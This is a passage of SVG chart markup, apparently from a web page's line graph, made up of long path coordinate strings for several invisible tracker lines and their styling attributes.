324.79871323529414 123.14467793066623 L 326.32674632352945 123.14467793066623 L 327.8547794117647 123.14467793066623 L 329.3828125 123.14467793066623 L 330.9108455882353 123.14467793066623 L 332.4388786764706 123.14467793066623 L 333.9669117647059 123.14467793066623 L 335.4949448529412 123.14467793066623 L 337.02297794117646 119.25736913066623 L 338.55101102941177 117.28132049066622 L 340.0790441176471 112.22174513066622 L 341.6070772058824 82.9090072106662 L 343.1351102941177 82.9090072106662 L 344.6631433823529 82.9090072106662 L 346.19117647058823 82.9090072106662 L 347.71920955882354 82.9090072106662 L 349.24724264705884 82.9090072106662 L 350.77527573529414 82.9090072106662 L 352.30330882352945 82.9090072106662 L 353.8313419117647 82.9090072106662 L 355.359375 82.9090072106662 L 356.8874080882353 77.08884209066622 L 358.4154411764706 77.08884209066622 L 359.9434742647059 77.08884209066622 L 361.4715073529412 77.08884209066622 L 362.99954044117646 77.08884209066622 L 364.52757352941177 77.08884209066622 L 366.0556066176471 77.08884209066622 L 367.5836397058824 77.08884209066622 L 369.1116727941177 77.08884209066622 L 370.6397058823529 77.08884209066622 L 372.16773897058823 63.71002097066622 L 373.69577205882354 63.71002097066622 L 375.22380514705884 63.29585777066623 L 376.75183823529414 63.29585777066623 L 378.27987132352945 63.29585777066623 L 379.8079044117647 63.29585777066623 L 381.3359375 46.582454570666215 L 382.8639705882353 36.586806890666196 L 384.3920036764706 35.76075377066621 L 385.9200367647059 35.252202090666174 L 387.4480698529412 34.45044465066621 L 388.97610294117646 34.45044465066621 L 390.50413602941177 34.45044465066621 L 392.0321691176471 28.75783185066615 L 393.5602022058824 24.76119249066619 L 395.0882352941177 24.76119249066619 L 405.0882352941177 24.76119249066619" fill="none" isTracker="true" stroke-opacity="0.000001" stroke="rgb(192,192,192)" stroke-width="22" visibility="visible" zIndex="1" style=""></path><path d="M -6.088235294117647 236.8 L 3.9117647058823533 236.8 L 5.439797794117648 236.8 L 6.967830882352942 236.8 L 8.495863970588236 236.8 L 10.02389705882353 236.8 L 11.551930147058824 236.8 L 13.07996323529412 236.8 L 14.607996323529413 236.8 L 16.136029411764707 236.8 L 17.6640625 236.8 L 19.192095588235297 236.8 L 20.72012867647059 236.8 L 22.248161764705884 236.8 L 23.776194852941178 236.8 L 25.30422794117647 236.8 L 26.832261029411764 236.8 L 28.360294117647058 236.8 L 29.88832720588235 236.8 L 31.416360294117645 236.8 L 32.94439338235294 236.8 L 34.47242647058823 236.8 L 36.00045955882353 236.8 L 37.528492647058826 236.8 L 39.056525735294116 236.8 L 40.58455882352941 236.8 L 42.1125919117647 236.8 L 43.640625 236.8 L 45.16865808823529 236.8 L 46.69669117647059 236.8 L 48.224724264705884 236.8 L 49.75275735294118 236.8 L 51.28079044117648 236.8 L 52.80882352941177 236.8 L 54.336856617647065 236.8 L 55.864889705882355 236.8 L 57.39292279411765 236.8 L 58.92095588235295 236.8 L 60.44898897058824 236.8 L 61.977022058823536 236.8 L 63.505055147058826 236.8 L 65.03308823529412 236.8 L 66.56112132352942 236.8 L 68.08915441176471 236.8 L 69.6171875 236.8 L 71.1452205882353 236.8 L 72.6732536764706 236.8 L 74.20128676470588 236.8 L 75.72931985294119 236.8 L 77.25735294117648 236.8 L 78.78538602941177 236.8 L 80.31341911764706 236.8 L 81.84145220588236 236.8 L 83.36948529411765 236.8 L 84.89751838235294 236.8 L 86.42555147058825 236.8 L 87.95358455882354 236.8 L 89.48161764705883 236.8 L 91.00965073529413 236.8 L 92.53768382352942 236.8 L 94.06571691176471 236.8 L 95.59375 236.8 L 97.1217830882353 236.8 L 98.6498161764706 236.8 L 100.17784926470588 236.8 L 101.70588235294119 236.8 L 103.23391544117648 236.8 L 104.76194852941177 236.8 L 106.28998161764706 236.8 L 107.81801470588236 236.8 L 109.34604779411765 236.8 L 110.87408088235294 236.8 L 112.40211397058825 236.8 L 113.93014705882354 236.8 L 115.45818014705883 236.8 L 116.98621323529413 236.8 L 118.51424632352942 236.8 L 120.04227941176471 236.8 L 121.5703125 236.8 L 123.0983455882353 236.8 L 124.6263786764706 236.8 L 126.15441176470588 236.8 L 127.68244485294119 236.8 L 129.21047794117646 236.8 L 130.73851102941177 236.8 L 132.26654411764707 236.8 L 133.79457720588235 236.8 L 135.32261029411765 236.50725481600034 L 136.85064338235296 235.89758953600034 L 138.37867647058823 235.89758953600034 L 139.90670955882354 235.89758953600034 L 141.43474264705884 235.89758953600034 L 142.96277573529412 235.89758953600034 L 144.49080882352942 235.36319824000034 L 146.01884191176472 234.61045208533338 L 147.546875 233.96754797866723 L 149.0749080882353 232.6885438186672 L 150.6029411764706 231.93467444266722 L 152.13097426470588 231.04398913066746 L 153.6590073529412 229.45447228800128 L 155.18704044117646 227.6403948480013 L 156.71507352941177 225.1495548480013 L 158.24310661764707 223.5329970240013 L 159.77113970588235 221.9904865600013 L 161.29917279411765 220.9099681600013 L 162.82720588235296 220.2150485653341 L 164.35523897058823 218.3091874453341 L 165.88327205882354 216.68347256533409 L 167.41130514705884 213.77069048533406 L 168.93933823529412 212.36736632533407 L 170.46737132352942 209.9027045653341 L 171.99540441176472 209.23052408533408 L 173.5234375 207.43804280533408 L 175.0514705882353 206.15264504533408 L 176.5795036764706 204.6402389653341 L 178.10753676470588 202.88960024533407 L 179.6355698529412 201.74677976533405 L 181.1636029411765 200.21007800533408 L 182.69163602941177 199.2723500053341 L 184.21966911764707 198.50812299733408 L 185.74770220588235 198.50812299733408 L 187.27573529411765 198.1032435413342 L 188.80376838235296 197.5879193813342 L 190.33180147058823 196.38461386666745 L 191.85983455882354 195.82815281066746 L 193.38786764705884 195.82815281066746 L 194.91590073529412 195.82815281066746 L 196.44393382352942 195.82815281066746 L 197.97196691176472 195.82815281066746 L 199.5 195.82815281066746 L 201.0280330882353 195.82815281066746 L 202.5560661764706 195.82815281066746 L 204.08409926470588 195.34348951466745 L 205.6121323529412 194.74195357866745 L 207.1401654411765 194.13355320533395 L 208.66819852941177 194.0161398720007 L 210.19623161764707 193.83215416533406 L 211.72426470588235 193.4435061653341 L 213.25229779411765 193.1748009173341 L 214.78033088235296 191.56097497600047 L 216.30836397058823 188.2339231360005 L 217.83639705882354 184.73547308800025 L 219.36443014705884 184.41820844800026 L 220.89246323529412 184.41820844800026 L 222.42049632352942 184.41820844800026 L 223.94852941176472 184.41820844800026 L 225.4765625 184.41820844800026 L 227.0045955882353 184.41820844800026 L 228.5326286764706 184.41820844800026 L 230.06066176470588 184.41820844800026 L 231.5886948529412 184.41820844800026 L 233.1167279411765 184.41820844800026 L 234.64476102941177 184.41820844800026 L 236.17279411764707 183.20274956800023 L 237.70082720588238 180.34217399466627 L 239.22886029411765 179.20730999466628 L 240.75689338235296 178.37752727466628 L 242.28492647058823 178.37752727466628 L 243.81295955882354 178.26970118399976 L 245.34099264705884 178.26970118399976 L 246.86902573529412 178.26970118399976 L 248.39705882352942 178.26970118399976 L 249.92509191176472 178.26970118399976 L 251.453125 178.26970118399976 L 252.9811580882353 178.26970118399976 L 254.5091911764706 177.60764390399976 L 256.0372242647059 176.21131718399977 L 257.56525735294116 175.39002374399976 L 259.09329044117646 174.36015686399975 L 260.62132352941177 172.34496518399976 L 262.1493566176471 171.51937382399976 L 263.6773897058824 171.14074483199977 L 265.2054227941177 170.61452313599963 L 266.7334558823529 167.69499225599964 L 268.26148897058823 167.23873785599963 L 269.78952205882354 165.79854393599962 L 271.31755514705884 164.34552729599963 L 272.84558823529414 163.81610169599963 L 274.37362132352945 163.5164656319996 L 275.9016544117647 163.5164656319996 L 277.4296875 163.5164656319996 L 278.9577205882353 163.5164656319996 L 280.4857536764706 162.96027571199963 L 282.0137867647059 162.46325263999915 L 283.54181985294116 161.76315343999914 L 285.06985294117646 156.51088207999913 L 286.59788602941177 150.98766415999916 L 288.1259191176471 145.64261455999912 L 289.6539522058824 144.91086703999912 L 291.1819852941177 139.12849519999915 L 292.7100183823529 133.04782639999914 L 294.23805147058823 127.76958991999913 L 295.76608455882354 123.83113231999914 L 297.29411764705884 121.19799209599915 L 298.82215073529414 116.31456041599915 L 300.35018382352945 110.97760937599915 L 301.8782169117647 106.29866633599914 L 303.40625 101.35044617599914 L 304.9342830882353 98.07425897599916 L 306.4623161764706 94.82081167999914 L 307.9903492647059 92.1447269866654 L 309.51838235294116 89.74272803199796 L 311.04641544117646 89.74272803199796 L 312.57444852941177 89.74272803199796 L 314.1024816176471 89.37896771199794 L 315.6305147058824 88.01867603199796 L 317.1585477941177 88.01867603199796 L 318.6865808823529 88.01867603199796 L 320.21461397058823 88.01867603199796 L 321.74264705882354 88.01867603199796 L 323.27068014705884 88.01867603199796 L 324.79871323529414 85.62675923199558 L 326.32674632352945 79.24239443199559 L 327.8547794117647 73.29805139199559 L 329.3828125 68.96262227199557 L 330.9108455882353 61.243344831995586 L 332.4388786764706 61.243344831995586 L 333.9669117647059 61.243344831995586 L 335.4949448529412 61.243344831995586 L 337.02297794117646 61.243344831995586 L 338.55101102941177 61.243344831995586 L 340.0790441176471 61.243344831995586 L 341.6070772058824 61.243344831995586 L 343.1351102941177 61.243344831995586 L 344.6631433823529 61.243344831995586 L 346.19117647058823 61.243344831995586 L 347.71920955882354 61.243344831995586 L 349.24724264705884 61.243344831995586 L 350.77527573529414 56.36598707199559 L 352.30330882352945 51.59593523199558 L 353.8313419117647 51.59593523199558 L 355.359375 47.1822200319956 L 356.8874080882353 47.1822200319956 L 358.4154411764706 47.1822200319956 L 359.9434742647059 47.1822200319956 L 361.4715073529412 47.1822200319956 L 362.99954044117646 47.1822200319956 L 364.52757352941177 47.1822200319956 L 366.0556066176471 47.1822200319956 L 367.5836397058824 47.1822200319956 L 369.1116727941177 47.1822200319956 L 370.6397058823529 47.1822200319956 L 372.16773897058823 47.1822200319956 L 373.69577205882354 47.1822200319956 L 375.22380514705884 47.1822200319956 L 376.75183823529414 47.1822200319956 L 378.27987132352945 46.90146995199555 L 379.8079044117647 46.90146995199555 L 381.3359375 41.28916787199557 L 382.8639705882353 39.96640307199556 L 384.3920036764706 39.96640307199556 L 385.9200367647059 39.96640307199556 L 387.4480698529412 39.96640307199556 L 388.97610294117646 39.96640307199556 L 390.50413602941177 39.96640307199556 L 392.0321691176471 37.22124776532809 L 393.5602022058824 35.36195336532808 L 395.0882352941177 35.05488296532809 L 405.0882352941177 35.05488296532809" fill="none" isTracker="true" stroke-opacity="0.000001" stroke="rgb(192,192,192)" stroke-width="22" visibility="visible" zIndex="1" style=""></path><path d="M -6.088235294117647 236.8 L 3.9117647058823533 236.8 L 5.439797794117648 236.8 L 6.967830882352942 236.8 L 8.495863970588236 236.8 L 10.02389705882353 236.8 L 11.551930147058824 236.8 L 13.07996323529412 236.8 L 14.607996323529413 236.8 L 16.136029411764707 236.8 L 17.6640625 236.8 L 19.192095588235297 236.8 L 20.72012867647059 236.8 L 22.248161764705884 236.8 L 23.776194852941178 236.8 L 25.30422794117647 236.8 L 26.832261029411764 236.8 L 28.360294117647058 236.8 L 29.88832720588235 236.8 L 31.416360294117645 236.8 L 32.94439338235294 236.8 L 34.47242647058823 236.8 L 36.00045955882353 236.8 L 37.528492647058826 236.8 L 39.056525735294116 236.8 L 40.58455882352941 236.8 L 42.1125919117647 236.8 L 43.640625 236.8 L 45.16865808823529 236.8 L 46.69669117647059 236.8 L 48.224724264705884 236.8 L 49.75275735294118 236.8 L 51.28079044117648 236.8 L 52.80882352941177 236.8 L 54.336856617647065 236.8 L 55.864889705882355 236.8 L 57.39292279411765 236.8 L 58.92095588235295 236.8 L 60.44898897058824 236.8 L 61.977022058823536 236.8 L 63.505055147058826 236.8 L 65.03308823529412 236.8 L 66.56112132352942 236.8 L 68.08915441176471 236.8 L 69.6171875 236.8 L 71.1452205882353 236.8 L 72.6732536764706 236.8 L 74.20128676470588 236.8 L 75.72931985294119 236.8 L 77.25735294117648 236.8 L 78.78538602941177 236.8 L 80.31341911764706 236.8 L 81.84145220588236 236.8 L 83.36948529411765 236.8 L 84.89751838235294 236.8 L 86.42555147058825 236.8 L 87.95358455882354 236.8 L 89.48161764705883 236.8 L 91.00965073529413 236.8 L 92.53768382352942 236.8 L 94.06571691176471 236.8 L 95.59375 236.8 L 97.1217830882353 236.8 L 98.6498161764706 236.8 L 100.17784926470588 236.8 L 101.70588235294119 236.8 L 103.23391544117648 236.8 L 104.76194852941177 236.8 L 106.28998161764706 236.8 L 107.81801470588236 236.8 L 109.34604779411765 236.8 L 110.87408088235294 236.8 L 112.40211397058825 236.8 L 113.93014705882354 236.8 L 115.45818014705883 236.8 L 116.98621323529413 236.8 L 118.51424632352942 236.8 L 120.04227941176471 236.8 L 121.5703125 236.8 L 123.0983455882353 236.8 L 124.6263786764706 236.8 L 126.15441176470588 236.8 L 127.68244485294119 236.8 L 129.21047794117646 236.8 L 130.73851102941177 236.8 L 132.26654411764707 236.8 L 133.79457720588235 236.8 L 135.32261029411765 236.8 L 136.85064338235296 236.8 L 138.37867647058823 236.8 L 139.90670955882354 236.8 L 141.43474264705884 236.8 L 142.96277573529412 236.8 L 144.49080882352942 236.78819946666667 L 146.01884191176472 236.76743052799998 L 147.546875 236.76743052799998 L 149.0749080882353 236.76743052799998 L 150.6029411764706 236.76743052799998 L 152.13097426470588 236.76743052799998 L 153.6590073529412 236.76743052799998 L 155.18704044117646 236.640553088 L 156.71507352941177 236.640553088 L 158.24310661764707 236.640553088 L 159.77113970588235 236.640553088 L 161.29917279411765 236.640553088 L 162.82720588235296 236.640553088 L 164.35523897058823 236.640553088 L 165.88327205882354 236.640553088 L 167.41130514705884 236.640553088 L 168.93933823529412 236.640553088 L 170.46737132352942 236.640553088 L 171.99540441176472 236.640553088 L 173.5234375 236.640553088 L 175.0514705882353 236.640553088 L 176.5795036764706 236.640553088 L 178.10753676470588 236.640553088 L 179.6355698529412 236.640553088 L 181.1636029411765 236.640553088 L 182.69163602941177 236.640553088 L 184.21966911764707 236.640553088 L 185.74770220588235 236.640553088 L 187.27573529411765 236.640553088 L 188.80376838235296 236.640553088 L 190.33180147058823 236.640553088 L 191.85983455882354 236.640553088 L 193.38786764705884 236.640553088 L 194.91590073529412 236.640553088 L 196.44393382352942 236.640553088 L 197.97196691176472 236.640553088 L 199.5 236.640553088 L 201.0280330882353 236.640553088 L 202.5560661764706 236.640553088 L 204.08409926470588 236.640553088 L 205.6121323529412 236.640553088 L 207.1401654411765 236.640553088 L 208.66819852941177 236.640553088 L 210.19623161764707 236.640553088 L 211.72426470588235 236.640553088 L 213.25229779411765 236.640553088 L 214.78033088235296 236.640553088 L 216.30836397058823 236.640553088 L 217.83639705882354 236.640553088 L 219.36443014705884 236.640553088 L 220.89246323529412 236.640553088 L 222.42049632352942 236.640553088 L 223.94852941176472 236.640553088 L 225.4765625 236.640553088 L 227.0045955882353 236.640553088 L 228.5326286764706 236.640553088 L 230.06066176470588 236.640553088 L 231.5886948529412 236.640553088 L 233.1167279411765 236.640553088 L 234.64476102941177 236.262752896 L 236.17279411764707 235.59710493866626 L 237.70082720588238 235.59710493866626 L 239.22886029411765 235.59710493866626 L 240.75689338235296 235.59710493866626 L 242.28492647058823 235.59710493866626 L 243.81295955882354 235.59710493866626 L 245.34099264705884 235.59710493866626 L 246.86902573529412 235.03695453866627 L 248.39705882352942 235.03695453866627 L 249.92509191176472 235.03695453866627 L 251.453125 235.03695453866627 L 252.9811580882353 235.03695453866627 L 254.5091911764706 234.79627101866626 L 256.0372242647059 234.79627101866626 L 257.56525735294116 234.79627101866626 L 259.09329044117646 234.79627101866626 L 260.62132352941177 234.22608977066625 L 262.1493566176471 234.22608977066625 L 263.6773897058824 233.38053261866628 L 265.2054227941177 232.14064781866625 L 266.7334558823529 231.52650701866628 L 268.26148897058823 230.10567149866625 L 269.78952205882354 228.30374189866626 L 271.31755514705884 225.22707053866628 L 272.84558823529414 225.22707053866628 L 274.37362132352945 225.22707053866628 L 275.9016544117647 225.22707053866628 L 277.4296875 224.81399661866624 L 278.9577205882353 223.65069293866625 L 280.4857536764706 223.65069293866625 L 282.0137867647059 223.65069293866625 L 283.54181985294116 223.65069293866625 L 285.06985294117646 223.65069293866625 L 286.59788602941177 223.65069293866625 L 288.1259191176471 223.65069293866625 L 289.6539522058824 223.65069293866625 L 291.1819852941177 223.65069293866625 L 292.7100183823529 223.65069293866625 L 294.23805147058823 223.65069293866625 L 295.76608455882354 223.65069293866625 L 297.29411764705884 223.65069293866625 L 298.82215073529414 223.65069293866625 L 300.35018382352945 223.65069293866625 L 301.8782169117647 223.65069293866625 L 303.40625 223.65069293866625 L 304.9342830882353 223.01968013866627 L 306.4623161764706 221.93660429866625 L 307.9903492647059 221.93660429866625 L 309.51838235294116 217.78161441066626 L 311.04641544117646 214.86760412799998 L 312.57444852941177 213.88576818133254 L 314.1024816176471 213.88576818133254 L 315.6305147058824 213.88576818133254 L 317.1585477941177 210.6846031679988 L 318.6865808823529 204.55961330133607 L 320.21461397058823 200.26737650133606 L 321.74264705882354 180.01167026133606 L 323.27068014705884 172.83207304533607 L 324.79871323529414 168.88199330133608 L 326.32674632352945 164.46152930133607 L 327.8547794117647 158.0355386133361 L 329.3828125 150.96954501333607 L 330.9108455882353 141.71086629333607 L 332.4388786764706 134.81065321600232 L 333.9669117647059 127.58171674666863 L 335.4949448529412 127.58171674666863 L 337.02297794117646 127.58171674666863 L 338.55101102941177 125.33127216000116 L 340.0790441176471 125.33127216000116 L 341.6070772058824 125.33127216000116 L 343.1351102941177 125.33127216000116 L 344.6631433823529 125.33127216000116 L 346.19117647058823 125.33127216000116 L 347.71920955882354 125.33127216000116 L 349.24724264705884 125.33127216000116 L 350.77527573529414 125.33127216000116 L 352.30330882352945 125.33127216000116 L 353.8313419117647 125.33127216000116 L 355.359375 125.33127216000116 L 356.8874080882353 125.33127216000116 L 358.4154411764706 125.33127216000116 L 359.9434742647059 125.33127216000116 L 361.4715073529412 125.33127216000116 L 362.99954044117646 120.54637296000115 L 364.52757352941177 115.63594608000113 L 366.0556066176471 115.63594608000113 L 367.5836397058824 115.63594608000113 L 369.1116727941177 115.63594608000113 L 370.6397058823529 115.63594608000113 L 372.16773897058823 115.63594608000113 L 373.69577205882354 115.63594608000113 L 375.22380514705884 112.81359792000114 L 376.75183823529414 110.49875952000116 L 378.27987132352945 110.49875952000116 L 379.8079044117647 110.20181232000115 L 381.3359375 109.91161392000114 L 382.8639705882353 109.91161392000114 L 384.3920036764706 109.91161392000114 L 385.9200367647059 109.13077776000114 L 387.4480698529412 109.13077776000114 L 388.97610294117646 109.13077776000114 L 390.50413602941177 108.82484400000112 L 392.0321691176471 108.79657323733451 L 393.5602022058824 108.79657323733451 L 395.0882352941177 105.94183083733449 L 405.0882352941177 105.94183083733449" fill="none" isTracker="true" stroke-opacity="0.000001" stroke="rgb(192,192,192)" stroke-width="22" visibility="visible" zIndex="1" style=""></path><path d="M -6.088235294117647 236.8 L 3.9117647058823533 236.8 L 5.439797794117648 236.8 L 6.967830882352942 236.8 L 8.495863970588236 236.8 L 10.02389705882353 236.8 L 11.551930147058824 236.8 L 13.07996323529412 236.8 L 14.607996323529413 236.8 L 16.136029411764707 236.8 L 17.6640625 236.8 L 19.192095588235297 236.8 L 20.72012867647059 236.8 L 22.248161764705884 236.8 L 23.776194852941178 236.8 L 25.30422794117647 236.8 L 26.832261029411764 236.8 L 28.360294117647058 236.8 L 29.88832720588235 236.8 L 31.416360294117645 236.8 L 32.94439338235294 236.8 L 34.47242647058823 236.8 L 36.00045955882353 236.8 L 37.528492647058826 236.8 L 39.056525735294116 236.8 L 40.58455882352941 236.8 L 42.1125919117647 236.8 L 43.640625 236.8 L 45.16865808823529 236.8 L 46.69669117647059 236.8 L 48.224724264705884 236.8 L 49.75275735294118 236.8 L 51.28079044117648 236.8 L 52.80882352941177 236.8 L 54.336856617647065 236.8 L 55.864889705882355 236.8 L 57.39292279411765 236.8 L 58.92095588235295 236.8 L 60.44898897058824 236.8 L 61.977022058823536 236.8 L 63.505055147058826 236.8 L 65.03308823529412 236.8 L 66.56112132352942 236.8 L 68.08915441176471 236.8 L 69.6171875 236.8 L 71.1452205882353 236.8 L 72.6732536764706 236.8 L 74.20128676470588 236.8 L 75.72931985294119 236.8 L 77.25735294117648 236.8 L 78.78538602941177 236.8 L 80.31341911764706 236.8 L 81.84145220588236 236.8 L 83.36948529411765 236.8 L 84.89751838235294 236.8 L 86.42555147058825 236.8 L 87.95358455882354 236.8 L 89.48161764705883 236.8 L 91.00965073529413 236.8 L 92.53768382352942 236.8 L 94.06571691176471 236.8 L 95.59375 236.8 L 97.1217830882353 236.8 L 98.6498161764706 236.8 L 100.17784926470588 236.8 L 101.70588235294119 236.8 L 103.23391544117648 236.8 L 104.76194852941177 236.8 L 106.28998161764706 236.8 L 107.81801470588236 236.8 L 109.34604779411765 236.8 L 110.87408088235294 236.8 L 112.40211397058825 236.8 L 113.93014705882354 236.8 L 115.45818014705883 236.8 L 116.98621323529413 236.8 L 118.51424632352942 236.8 L 120.04227941176471 236.8 L 121.5703125 236.8 L 123.0983455882353 236.8 L 124.6263786764706 236.8 L 126.15441176470588 236.8 L 127.68244485294119 236.8 L 129.21047794117646 236.8 L 130.73851102941177 236.8 L 132.26654411764707 236.8 L 133.79457720588235 236.8 L 135.32261029411765 236.8 L 136.85064338235296 236.8 L 138.37867647058823 236.8 L 139.90670955882354 236.8 L 141.43474264705884 236.8 L 142.96277573529412 236.8 L 144.49080882352942 236.8 L 146.01884191176472 236.8 L 147.546875 236.8 L 149.0749080882353 236.8 L 150.6029411764706 236.8 L 152.13097426470588 236.8 L 153.6590073529412 236.8 L 155.18704044117646 236.8 L 156.71507352941177 236.8 L 158.24310661764707 236.8 L 159.77113970588235 236.8 L 161.29917279411765 236.8 L 162.82720588235296 236.8 L 164.35523897058823 236.8 L 165.88327205882354 236.8 L 167.41130514705884 236.8 L 168.93933823529412 236.8 L 170.46737132352942 236.8 L 171.99540441176472 236.8 L 173.5234375 236.8 L 175.0514705882353 236.8 L 176.5795036764706 236.8 L 178.10753676470588 231.05474656 L 179.6355698529412 231.05474656 L 181.1636029411765 231.05474656 L 182.69163602941177 231.05474656 L 184.21966911764707 231.05474656 L 185.74770220588235 231.05474656 L 187.27573529411765 231.05474656 L 188.80376838235296 231.05474656 L 190.33180147058823 231.05474656 L 191.85983455882354 231.05474656 L 193.38786764705884 231.05474656 L 194.91590073529412 226.19561055999998 L 196.44393382352942 224.31216256 L 197.97196691176472 222.151541344 L 199.5 219.24145878399997 L 201.0280330882353 216.05062614399998 L 202.5560661764706 212.47699841066662 L 204.08409926470588 212.47699841066662 L 205.6121323529412 212.47699841066662 L 207.1401654411765 212.47699841066662 L 208.66819852941177 212.47699841066662 L 210.19623161764707 212.47699841066662 L 211.72426470588235 212.47699841066662 L 213.25229779411765 212.47699841066662 L 214.78033088235296 212.47699841066662 L 216.30836397058823 212.47699841066662 L 217.83639705882354 212.04237569066663 L 219.36443014705884 212.04237569066663 L 220.89246323529412 212.04237569066663 L 222.42049632352942 212.04237569066663 L 223.94852941176472 212.04237569066663 L 225.4765625 212.04237569066663 L 227.0045955882353 212.04237569066663 L 228.5326286764706 212.04237569066663 L 230.06066176470588 211.90512641066664 L 231.5886948529412 210.86108705066664 L 233.1167279411765 210.86108705066664 L 234.64476102941177 210.86108705066664 L 236.17279411764707 210.86108705066664 L 237.70082720588238 210.86108705066664 L 239.22886029411765 210.86108705066664 L 240.75689338235296 210.86108705066664 L 242.28492647058823 210.86108705066664 L 243.81295955882354 210.86108705066664 L 245.34099264705884 210.86108705066664 L 246.86902573529412 210.86108705066664 L 248.39705882352942 210.86108705066664 L 249.92509191176472 210.86108705066664 L 251.453125 210.86108705066664 L 252.9811580882353 210.86108705066664 L 254.5091911764706 210.86108705066664 L 256.0372242647059 210.86108705066664 L 257.56525735294116 210.86108705066664 L 259.09329044117646 210.86108705066664 L 260.62132352941177 210.86108705066664 L 262.1493566176471 210.86108705066664 L 263.6773897058824 210.86108705066664 L 265.2054227941177 210.86108705066664 L 266.7334558823529 210.86108705066664 L 268.26148897058823 210.86108705066664 L 269.78952205882354 210.86108705066664 L 271.31755514705884 210.86108705066664 L 272.84558823529414 210.86108705066664 L 274.37362132352945 210.86108705066664 L 275.9016544117647 210.86108705066664 L 277.4296875 210.86108705066664 L 278.9577205882353 210.86108705066664 L 280.4857536764706 210.86108705066664 L 282.0137867647059 210.86108705066664 L 283.54181985294116 210.86108705066664 L 285.06985294117646 210.86108705066664 L 286.59788602941177 210.86108705066664 L 288.1259191176471 210.86108705066664 L 289.6539522058824 210.86108705066664 L 291.1819852941177 210.86108705066664 L 292.7100183823529 210.86108705066664 L 294.23805147058823 210.86108705066664 L 295.76608455882354 210.86108705066664 L 297.29411764705884 210.86108705066664 L 298.82215073529414 210.86108705066664 L 300.35018382352945 210.86108705066664 L 301.8782169117647 210.86108705066664 L 303.40625 210.62592570666675 L 304.9342830882353 210.62592570666675 L 306.4623161764706 210.61216762666675 L 307.9903492647059 210.61216762666675 L 309.51838235294116 210.52388661333362 L 311.04641544117646 210.3052254933336 L 312.57444852941177 208.7924997333336 L 314.1024816176471 207.36234731733362 L 315.6305147058824 205.1514404373336 L 317.1585477941177 203.7417226773336 L 318.6865808823529 202.3316461653336 L 320.21461397058823 200.9224967253336 L 321.74264705882354 199.2784890453336 L 323.27068014705884 195.1232528853336 L 324.79871323529414 195.1232528853336 L 326.32674632352945 195.1232528853336 L 327.8547794117647 195.1232528853336 L 329.3828125 195.1232528853336 L 330.9108455882353 195.1232528853336 L 332.4388786764706 193.7653303893336 L 333.9669117647059 192.33677755733243 L 335.4949448529412 190.20356436266377 L 337.02297794117646 189.8794088426638 L 338.55101102941177 187.7975658559975 L 340.0790441176471 185.8471981759975 L 341.6070772058824 183.48582857599752 L 343.1351102941177 179.5350100159975 L 344.6631433823529 179.1702196159975 L 346.19117647058823 176.47069961599752 L 347.71920955882354 171.9355060159975 L 349.24724264705884 168.03867785599752 L 350.77527573529414 166.8063469759975 L 352.30330882352945 164.63820617599748 L 353.8313419117647 163.18621961599752 L 355.359375 161.34628361599752 L 356.8874080882353 161.2652103999975 L 358.4154411764706 161.0903572799975 L 359.9434742647059 158.36497871999748 L 361.4715073529412 155.8299163199975 L 362.99954044117646 153.14236655999747 L 364.52757352941177 150.87535583999747 L 366.0556066176471 150.87535583999747 L 367.5836397058824 149.06984977066423 L 369.1116727941177 144.84877137066425 L 370.6397058823529 143.97412689066422 L 372.16773897058823 138.53459409066423 L 373.69577205882354 136.6388561706642 L 375.22380514705884 134.6385118506642 L 376.75183823529414 133.2280126506642 L 378.27987132352945 129.9197508906642 L 379.8079044117647 129.9197508906642 L 381.3359375 129.9197508906642 L 382.8639705882353 127.37342865066421 L 384.3920036764706 125.21743569066422 L 385.9200367647059 124.13492817066421 L 387.4480698529412 122.84320785066421 L 388.97610294117646 122.47195281066419 L 390.50413602941177 122.47195281066419 L 392.0321691176471 122.47195281066419 L 393.5602022058824 122.47195281066419 L 395.0882352941177 122.47195281066419 L 405.0882352941177 122.47195281066419" fill="none" isTracker="true" stroke-opacity="0.000001" stroke="rgb(192,192,192)" stroke-width="22" visibility="visible" zIndex="1" style=""></path><path d="M -6.088235294117647 236.8 L 3.9117647058823533 236.8 L 5.439797794117648 236.8 L 6.967830882352942 236.8 L 8.495863970588236 236.8 L 10.02389705882353 236.8 L 11.551930147058824 236.8 L 13.07996323529412 236.8 L 14.607996323529413 236.8 L 16.136029411764707 236.8 L 17.6640625 236.8 L 19.192095588235297 236.8 L 20.72012867647059 236.8 L 22.248161764705884 236.8 L 23.776194852941178 236.8 L 25.30422794117647 236.8 L 26.832261029411764 236.8 L 28.360294117647058 236.8 L 29.88832720588235 236.8 L 31.416360294117645 236.8 L 32.94439338235294 236.8 L 34.47242647058823 236.8 L 36.00045955882353 236.8 L 37.528492647058826 236.8 L 39.056525735294116 236.8 L 40.58455882352941 236.8 L 42.1125919117647 236.8 L 43.640625 236.8 L 45.16865808823529 236.8 L 46.69669117647059 236.8 L 48.224724264705884 236.8 L 49.75275735294118 236.8 L 51.28079044117648 236.8 L 52.80882352941177 236.8 L 54.336856617647065 236.8 L 55.864889705882355 236.8 L 57.39292279411765 236.77434666666662 L 58.92095588235295 236.77434666666662 L 60.44898897058824 236.77434666666662 L 61.977022058823536 236.77434666666662 L 63.505055147058826 236.77434666666662 L 65.03308823529412 236.77434666666662 L 66.56112132352942 236.77434666666662 L 68.08915441176471 236.77434666666662 L 69.6171875 236.77434666666662 L 71.1452205882353 236.77434666666662 L 72.6732536764706 236.77434666666662 L 74.20128676470588 236.77434666666662 L 75.72931985294119 236.77434666666662 L 77.25735294117648 236.77434666666662 L 78.78538602941177 236.77434666666662 L 80.31341911764706 236.77434666666662 L 81.84145220588236 236.77434666666662 L 83.36948529411765 236.77434666666662 L 84.89751838235294 236.77434666666662 L 86.42555147058825 236.77434666666662 L 87.95358455882354 236.77434666666662 L 89.48161764705883 236.77434666666662 L 91.00965073529413 236.77434666666662 L 92.53768382352942 236.77434666666662 L 94.06571691176471 236.77434666666662 L 95.59375 236.77434666666662 L 97.1217830882353 236.77434666666662 L 98.6498161764706 236.77434666666662 L 100.17784926470588 236.77434666666662 L 101.70588235294119 236.77434666666662 L 103.23391544117648 236.77434666666662 L 104.76194852941177 236.77434666666662 L 106.28998161764706 236.77434666666662 L 107.81801470588236 236.77434666666662 L 109.34604779411765 236.77434666666662 L 110.87408088235294 236.77434666666662 L 112.40211397058825 236.77434666666662 L 113.93014705882354 236.77434666666662 L 115.45818014705883 236.77434666666662 L 116.98621323529413 236.77434666666662 L 118.51424632352942 236.62267626666662 L 120.04227941176471 236.62267626666662 L 121.5703125 236.62267626666662 L 123.0983455882353 236.62267626666662 L 124.6263786764706 